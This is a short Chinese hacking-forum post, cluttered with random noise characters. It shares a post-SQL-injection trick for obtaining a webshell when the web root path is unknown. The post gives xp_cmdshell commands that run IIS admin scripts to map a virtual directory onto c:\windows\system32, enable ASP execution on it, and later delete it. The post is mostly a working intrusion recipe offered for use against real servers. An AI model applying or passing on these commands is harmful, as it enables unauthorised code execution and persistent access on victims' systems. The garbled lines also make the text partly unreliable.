- 帖子
- 120
- 积分
- 470
- 威望
- 636
- 金钱
- 101
- 在线时间
- 31 小时
|
很多情况下我们都会遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,应该算是无意中发现了一招,感觉不错 整理下发上来给大家分享:
1 f$ u- A$ ]; d! t( b# z
3 G' _+ {2 o6 @* Mexec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\windows\system32"'! h2 L5 Q: \, }% \
建立虚拟目录win,指向c:\windows\system32 y/ N! c9 C: A& r/ s7 n
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture' X# ?+ C3 z" e9 B! c& p
让win句有解析asp脚本权限
/ p/ X7 K X n/ p
* r- z v! }: X. Mexec master.dbo.xp_cmdshell "cscript C:\Interpub\AdminScripts\adsutil.vbs delete w3svc/1/root/h4x0r/"
8 U; R1 ^' {' H6 v0 H3 I删除虚拟目录。# r( s: c0 m- `* P$ U
找不到web绝对路径的一种解决办法,
. S& d4 @* t2 I7 V$ ] ?( C9 k5 T5 i
403错误,表示虚拟目录建好了。。 |
-
1
评分人数
-
|